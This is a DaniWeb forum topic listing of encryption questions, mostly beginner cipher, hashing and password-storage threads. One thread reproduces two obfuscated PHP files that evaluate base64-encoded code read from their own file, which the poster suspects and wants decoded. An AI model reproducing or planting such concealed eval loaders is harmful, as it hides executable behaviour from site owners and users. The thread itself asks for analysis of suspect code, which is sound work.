1,159 Topics

Member Avatar for
Member Avatar for naveedqadri

Dear Expert, Thanks for helping me. I am facing problem while deleting a company from my application. When I click on delete ([COLOR="Red"]on comp1.aspx[/COLOR]) it direct to other Page ([COLOR="red"]company_delete.aspx[/COLOR]) when i put password as in databse , Instead it delete it gives error of wrong password. ([COLOR="red"]company_delete_save.aspx[/COLOR]). I mean …

0
75
Member Avatar for shaima88

[COLOR="Green"] hi :( i am a student i have problem i can not understand how to transfer encryption code to decryption >>>>> i have exam soon please help me to advance my self in vb.6 that is my code in encyption and i use transposition cipher .. Public Function encrypt(ByVal …

0
38
Member Avatar for DavidKroukamp

For now the code isn't to complex. Built in Netbeans 7 java 6.... just the basis for now but its very safe connection so thought i'd post it for anyone who needs it. A quit command may be sent to any client by specifying its ID and then press enter …

0
433
Member Avatar for polinolin

I want to create a php-based electronic voting using RSA encryption. anyone can love advice, what what wrote that should be encrypted so that e-voting run safely. Thanks mate! :$

0
68
Member Avatar for new2GUIBuilder

Hye. I'm a new daniweb members. I've been learning java for 4years from zero. i became to not lazy in java programming since i have to do my thesis project in java. i am developing a very simple jave coding for my thesis. the objective is to print cheque. as …

Member Avatar for stultuske
0
161
Member Avatar for AceStryker

I need to create a KeyStroke encryption, i studied about it and the theory is this: [LIST] [*]Check the keystate before keyloggers do it [*]Cancel the action of the key [*]get the active window [*]Simulate a virtual key in this window [/LIST] I can make the last three items, but …

Member Avatar for Morten Brendefu
0
217
Member Avatar for happygeek

So you want to work on any computer as you owned it, but without going through the whole remote access process? Thanks to an early-stage company established after the founders met whilst studying for PhDs in Computer Science at Cambridge University your wishes might just be about to come true. …

Member Avatar for javacle
0
633
Member Avatar for masterjiraya

I wanna try my self as an experience. Scenario: I have a member join and member log-in wherein the pass word is encrypted in the database (MySQL) Now let's say he forgot the password it too lazy to just open your email account for just getting the password recovery. What …

Member Avatar for cereal
0
198
Member Avatar for pinkboom

Hey guys, I wrote a 'bigger' program that uses a basic algorithm to crypts a text I input from keyboard, or from another text file. I have divided the program in the 'working' part and the 'non-working' part. The keyboard input is great, it works perfectly. But when I try …

Member Avatar for pinkboom
0
152
Member Avatar for Panathinaikos22

Hello, i want to ask, messing words in array is a good way to encrypt data? or can someone very easy to brake it here is an example [CODE] #include "stdafx.h" #include <fstream> using namespace std; // Decleration for functions void EncryptFile(char c[], int key1, int key2); void DecryptFile(string filename, …

Member Avatar for VernonDozier
0
390
Member Avatar for chriswinter

I need this program to encrypt by making letter a letter z and b, y and so on. The proffesor got us started by giving us this program and for the life of me i can't figure out how to change it. [CODE] public class ceaser { public static void …

Member Avatar for NormR1
0
298
Member Avatar for happygeek

DaniWeb has looked at Network Attached Storage in the shape of the [URL="http://www.daniweb.com/reviews/review308073.html"]myDitto server which offers excellent value in terms of both cost and capacity[/URL]. DaniWeb has looked at a personal cloud device in the [URL="http://www.daniweb.com/reviews/review260663.html"]very pink format of PogoPlug which is great for anytime and anywhere sharing[/URL]. DaniWeb has …

Member Avatar for PeterM88
0
650
Member Avatar for loserspearl

My Applet is working but I have 2 issues, I cannot get away from the 'metal' plaf background (trying to make it all solid blue) and when the user clicks on the 1st text box I want the prompting text to clear for the user to type their own. No …

Member Avatar for loserspearl
0
113
Member Avatar for loserspearl

Im writing the Applet GUI code that uses another class to translate a string into pig latin (dubbed PigLatin.class) My gui has two text areas, a few labels, and two buttons, but I'm having some trouble with event handling. [CODE]import javax.swing.*; import java.awt.*; import java.awt.event.*; public class TxtCrypt extends JApplet …

Member Avatar for NormR1
0
160
Member Avatar for calebcook

Does anyone know of a way to encrypt a string and output it as x number of characters? I need it to always return the same number of characters. I know MD5 always returns it as 32 characters. I'd like for it to return less that that, maybe 20 or …

Member Avatar for skraps
0
189
Member Avatar for nsyncpilu

Hy , I have to encrypt a message and then decrypt it. I have this code , but i need to save the encrypted string in a database and the code generates a random key every time. I could save the string and the key in the database but that …

Member Avatar for nsyncpilu
0
442
Member Avatar for jaxi

I'm working on a simple encryption/ decryption program for class. When I try to compile, I get a number of "expected areas" directed towards the following segment of code: [code] public static char encrypt(char c, String k) { String fullcrypt = (k + "abcdefghijklmnopqrstuvwxyz"); for (int i = 0; i …

Member Avatar for jaxi
0
200
Member Avatar for skraps

I'm skraps. I like looking at Goat porn see some here [URL="https://www.google.com/search?hl=en&q=goats&gs_sm=e&gs_upl=30958l31694l0l31842l6l6l0l0l0l1l222l808l1.4.1l6l0&bav=on.2,or.r_gc.r_pw.,cf.osb&biw=1280&bih=712&um=1&ie=UTF-8&tbm=isch&source=og&sa=N&tab=wi"]Goat Porn[/URL] Bad joke, I know. But hey it can be considered porn. They are naked, lol. I'm working on a few things. I have one website called [url]www.phonesnake.com[/url] and another one called [url]www.communicationslibrary.info[/url] . I'm not the best …

0
42
Member Avatar for rse

Hello, I am new to php and mysql and I need to do password encryption and decryption. The password will be saved in a data base, I need to use an algorithm that uses SALT varible. Can some please help me with that? Thanks in advance.

Member Avatar for rse
0
2K
Member Avatar for Wireboy

hey guy's I'm relatively new to C++ and I've been asked to make a Caesar Cipher. I'm supposed to take an encrypted .txt file and output it's decryption. I've sort of got an idea of my flow as shown below but I'm confused as to how to transform capitals in …

Member Avatar for Schol-R-LEA
0
257
Member Avatar for low1988

I'm working on a portion of the codes to encrypt the ATM card of the user. [CODE] Public class AtmCardAuth{ public static byte[] computeCheckBytes(int acctNum, int pin)throws Exception { // byte[] ret = new byte[32]; // for(int i=0; i<ret.length; ++i) ret[i] = (byte)i; // return ret; String password = Integer.toString(pin); …

Member Avatar for jwenting
0
199
Member Avatar for chriswinter

I am a begining software engineer in college and have been stumped by a small problem. The assignment is to "encrypt" any text entered. All we have to do is make capitals lower case and vice versa, additionally we have to make a's z's, b's y's and so on. //import …

Member Avatar for hfx642
0
155
Member Avatar for mrhankey

hi, what is the best password encryption to use on a website with mysql backend? i have used md5 and sha1 in the past however which is best? crypt? ◦RJINDAEL ? what is best to use? they wont be recovering the password only sent a new password if forgotten. so …

Member Avatar for Stefano Mtangoo
0
149
Member Avatar for Kurtismonger

Have a HP c7280 All-in-one series printer that will no longer printer wirelessly from an Apple MacBook. It connects to the wireless network okay, but the Mac can't see it anymore. It prints okay when connected via USB. I removed the HP software and drivers and reinstalled, still no wireless …

Member Avatar for jingda
0
265
Member Avatar for matharoo

What is the best approach we can follow while trying to solve a cipher text without a key? I searched over web but was unable to find some good method.... Plz help guys...

Member Avatar for hfx642
0
231
Member Avatar for Panathinaikos22

Here is my code, i will also give an example... [CODE]#include <iostream> using namespace std; class Encryption { private: int wp, wk, encryption; public: Encryption() { } Encryption(int password, int key) :wp(password), wk(key) { } int Encrypt_Store() { encryption = wp + wk; cout << "Encypted: ( " << hex …

Member Avatar for xfbs
0
181
Member Avatar for Panathinaikos22

Hello, is possible in C# create a file with custom extension? and the file can be open only from progra and not from others text editors. I have a login form were i store logs in txt file for now, that i want is to create an file named *.lst …

Member Avatar for Panathinaikos22
0
148
Member Avatar for mikkey91

Hi! :) I've been given a task in which I have to code a C++ program where an encryption key string with a length of 26 small alphabet is asked, then the user must input a word to encrypt and then it shows the encrypted word. If the encryption key …

Member Avatar for raptr_dflo
0
215
Member Avatar for MrCranium

I bought a script but it has two suspects encrypted files that I want to decrypt. Does anyone know how to do? [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=484;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmklFbapFMagd25jcUEPwtwVRJ9jd25MDBFVFoiXwJLIKXppcJEPwolVfucidtEPwtOgA0aTA0lNTlSJdo9mDB5gCBOsDB5gDBWJbUEpwe09weEIhWp7tMilCBOlFJEPwtkSd2YifolvdjppdMOlGt5XDuEJhUE7tMa4DbWIhtEpweShgWpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sDbYjRMc1dMHVFoiXwJLIKXpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sCB5pFuaSCbOlRmnPFtwpweShkoOiforINUnVcbFIOoy0CA1idMlXfBxifo9ZwtIIhUE7tJO0DbOScUE9wtOLCbOiRT5zcBxlC3WIhtEJA2l0cA1idMymcbwJRtwQwJxiFmkiGUEPwtkTDbOlaMyZDByJdoAJNT4JA2l0cA5idBAJhUEpweShkuOpfoxlwe0IkuOpfoxlBznfweSh[/CODE] and: [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=1804;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmYlF3Ypd25gF3OiFmWIhtEpweShFMaxfBlZca9vdMYlwtIIwJ4VR2YvdMcpcZ5XDuEJhUE7tmklFbapFMagd25jcUEPwtwVRJ9jdoyzF2azR21idMlXfBxifoAVFoiXwJLIKXpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sDbYjRMc1dMHVFoiXwJLIKXPLcoy0CUE9wo5lfZnrCbOiTByVDbn1doy0d3wIhtEpweShc2a0b3Y0CbO1F19SDBYldmYlwtIIhUE7tMlMwtIIky9WT1YAwtLhGXPLFo9zfy9iFmkiGUE9wtOgAr9TatE7tJOXd3Y0b2yZFMy5BZkXF2OgFoyzF3fvFMWJbUE9wo1LYUEPwtOXd3Y0b2yZFMy5BZkXF2OgFoyzF3fvFMWJbUEpweShkoyLdBlVb2OlfoypdtE9wtOLCbOiRT5zcBxlC3WIhtEJWBOsDB5zwJXJhJwSCbkZCbLIhtEJWBOsDB5ydBypdtw9NMyLcuYSCbYPcbHIhtELFo9zfy9iFmkiGaSJfui0OB1iDBxncoOZcbYzwl0IhUESwLyLdBlVAoyzF3fvFMWJNT4LFo9zfy9iFmkiGaSJFuYLb3niF3Y3d3kLwl0IhUEpweShDBCIhtEicB1XfuLIhtELCBOsDB5gcoa0CBlSwtLIhWp7tJOico1pdl9LcbOiDBXINUELCBOsDB5gcoa0CBlSBznfweShky9TOaYTUA9KBZkSd2fpdl9ico1pdl9pctkfwe0IDB50fMySwtIIkoyLdBlVb2OlfoypdySJWBOsDB5kOtkfwtLIKXPLb1YyA1YkT05dwMxvc2lVb2yLdBlVb2asCBlSwl0INUELCBOsDB5gcoa0CBlSBZknco1pdLasCBlSwl0IKXPLb1YyA1YkT05dwMyLdBlVb3kpc2i0FZkfBZkZb2ivdBAJbUE9wolVfucidtEPwtOico1pdl9LcbOiDBxdwLlzA2l0ca9YCB5ic2AJbUEpweShky9TOaYTUA9KBZkico1pdl9ZDBfPfuHJbaSJFl9jd3aXd24JbUE9wolVfucidtEPwtOico1pdl9LcbOiDBxdwLlzW291Fo9Vb01idMymcUkfwtLIKXPLb1YyA1YkT05dwMyLdBlVb3kpc2i0FZkfBZkZb3flCmYpfoAJbUE9wolVfucidtEPwtOico1pdl9LcbOiDBxdwLlza2aJF2l0ca9YCB5ic2AJbUEpweShky9TOaYTUA9KBZkico1pdl9ZDBfPfuHJbaSJFl90CBFJbUE9wolVfucidtEPwtOico1pdl9LcbOiDBxdwLlzaoymb01idMymcUkfwtLIKXPLb1YyA1YkT05dwMyLdBlVb3kpc2i0FZkfBZkZb2YvdB1ldmWJbUE9wolVfucidtEPwtOico1pdl9LcbOiDBxdwLlzW29sdBaVfy9YCB5ic2AJbUEpweShky9TOaYTUA9KBZkico1pdl9ZDBfPfuHJbaSJFl9iC2YvfB50wl0INUnpdmO2CBXIhtELCBOsDB5gcoa0CBlSBZkkF0yjC291dmOgTByVCBflwl0IhUE7tJOgA0aTA0lNTlSJCBOsDB5gFMlmDuOzwl1dwmkgFoymcUkfwe0IDB50fMySwtIIkoyLdBlVb2OlfoypdySJUbYWCBflb01idMymcUkfwtLIKXpPcByLcbwIhtEJdo9jCbOpd246Do9scU5XDuEJhUE7tMa4DbWIhtEpweShgWp9tMilCBOlFJEPwtkSd2YifolvdjppdMOlGt5XDuEJhUE7tI==[/CODE]

Member Avatar for cwarn23
0
223
Member Avatar for Zssffssz

Ok here it is: I want to read a file backwards, the catch is that I want to do this in binary mode to make a, really lame, data encryption program. Is there any easy way (<10 lines) To do this?

Member Avatar for vijayan121
0
704
Member Avatar for dean8710

can anybody share, the best encryption and decryption technique in PHP. here i just found 3 ways. are that any better technique? [QUOTE][ICODE]<?php //1 $password = 'mothafucka'; $sSalt = '8*S&AsEc4qUs'; $sHash = hash( 'whirlpool', $password . $sSalt ); echo $sHash."<br><br>"; //2 $password = "palancau87"; $password = sha1($password); $password = md5($password); …

Member Avatar for dean8710
0
173
Member Avatar for bkpally263

Hey all I need to convert audio file of wav format into text file in order to feed it as input to an encryption algorithm(IBE encrypt method of [URL="http://www.shamus.ie/"]Miracl[/URL] library takes only texts as input) and have to reconvert the decrypted text file to audio format. Could you please suggest …

Member Avatar for sujoy chatterje
0
1K
Member Avatar for OmniX

I have tried to research this and im always running into old articles. What I have come across are (possibly more): md5, sha1, hash, crypt and mcrypt Now I have used md5/sha1 before and have 32/40 character long strings the others I dont know too much about but in short, …

Member Avatar for Stefano Mtangoo
2
2K
Member Avatar for uv4u

How to protect a USB pen-drive from being formatting please reply soon if you have an answer I have tested bit-locker , drive encryption but it's useless

Member Avatar for jingda
0
185
Member Avatar for cfry

Hi all, I'm in the process of attempting to set up an IPSec tunnel between two LAN's. Here's an ASCII diagram (IP's changed): (Lan1: 192.168.0.0/24) | [D-Link NetDefend DFL-800 Firewall] | (Public IP1: 111.111.111.111) |/| |/| |/| <-IPSec Tunnel |/| |/| (Public IP2: 222.222.222.222) | [Fortinet Fortigate Firewall] (Lan2: 10.0.0.0/24) …

Member Avatar for medren
0
2K
Member Avatar for TrustyTony

Here is capital letter style caesar crypted message. We can simply try all possible shifts for first few words (ignoring punctuations, which is left as is). If both first words succeed we assume we cracked it. You could also use Vigenère encryption, but keeping non-letters is less simple, our Vigenère …

Member Avatar for TrustyTony
1
937
Member Avatar for jagan605

i am trying to implement ceaser's cipher in the generic sense by rotating the digits by integer n.i am trying to find out the pairs of these from a file containing words. this what i've done so far, [CODE] from string import * d = dict() l = [] for …

Member Avatar for TrustyTony
0
198
Member Avatar for mrjillberth

I am going to do my first Java Project the ElGamal's Encryption. Honestly, i have no idea yet on how to start my program because i don't have idea in encryption but i have to do it. Because it was assigned to me by our instructor. Please help me.

Member Avatar for mrjillberth
0
1K
Member Avatar for zzou

hi The question to which am using the for loop is as follows: Write a C interactive program that will encode a word or sentence entered by a user. The encryption will be done as follows: For any word or sentence (note: blank spaces, special characters are ignored here, i.e …

Member Avatar for kings_mitra
0
140
Member Avatar for Zssffssz

Ok this is somewhat of a second related post of my other one "C++ File". There is no need to read the other post just want to tell you. I want to make a console app that does the XOR thing I heard about using the simple ifstream and ofstream …

Member Avatar for doug65536
0
233
Member Avatar for sirlink99

I am taking data management this year, and we are currently learning about matrixes. I know they are used to encrypt things, and the teacher even used it as an example. my problem is the following. We are only learning how to encrypt and decrypt using a 2x2 matrix. That …

Member Avatar for Ezzaral
0
114
Member Avatar for Xdwardo

Hi everyone 8) I'm new around here but thought it's about time I joined a good PHP forum! I'll introduce myself properly on the right section, but for now, I'll my post my coding problem on here. I wonder if any has any knowledge or can help. I'm setting up …

Member Avatar for Xdwardo
0
174
Member Avatar for NetJunkie

I am using a DLL file as my license file for a VB.NET project and was wondering if there was a way to make it locked so notepad can't open it and edit the data stored in there. Thanks in advanced!

Member Avatar for adam_k
0
423
Member Avatar for moparman426

alright i have this problem out of my book that i bought used and goin through doin some self excersiesfor practice now this one has me stumped to ends the only thing i have so far is my dim as integer thats it but the problem reads like this: Your …

Member Avatar for Reverend Jim
0
222
Member Avatar for Master Mascus

Hey guys i got a question to solve, can anyone help me out.. Write a C interactive program that will encode a word or sentence entered by a user. The encryption will be done as follows: For any word or sentence (note: blank spaces, special characters are ignored here, i.e …

Member Avatar for Master Mascus
0
169
Member Avatar for TrustyTony

Inspired by password entry discussions, I did this simple entry. You must of course find safe way to store the passwords, for example hashlib ([url]http://stackoverflow.com/questions/4820043/basics-of-python-encryption-w-hashlib-sha1[/url]) or [URL="https://www.dlitz.net/software/pycrypto/"]PyCrypto[/URL] and replace the simplistic example match for real life usage. The print at line 23 is just to check the attempts and to …

Member Avatar for Enalicho
0
10K
Member Avatar for maria536

Can someone help me I keep getting an error code on this line and I cannot figure it out. cout <<"Encrypted digits:"; << digit_three; digit_four; digit_one; digit_two; << endl;// display encrypted numbers ________________________________________________________________________________________ #include <iostream> // required to perform C++ stream I/O #include <iomanip> // required to perform setprecision stream …

Member Avatar for maria536
0
190
Member Avatar for TrustyTony
Member Avatar for Brenhines

Hi, I downloaded AecRijndael v.1.16 encryption component for Delphi 5 from Torry.net. There is no help included and I can't work out how to use it. When it is installed it has three pertinent properties. Cyphermode - which can be ECB CBC CFB OFB Keysize - which can be SMALL128 …

Member Avatar for Brenhines
0
262
Member Avatar for TrustyTony

There was question about encryption in Delphi/Pascal forum and a guy was suggested reversing the bits as additional step (I do not know if he in reality meant XOR 255, that is making 0's 1's and vice versa). As it keeps still same distribution of letters I suggested as better …

0
635

The End.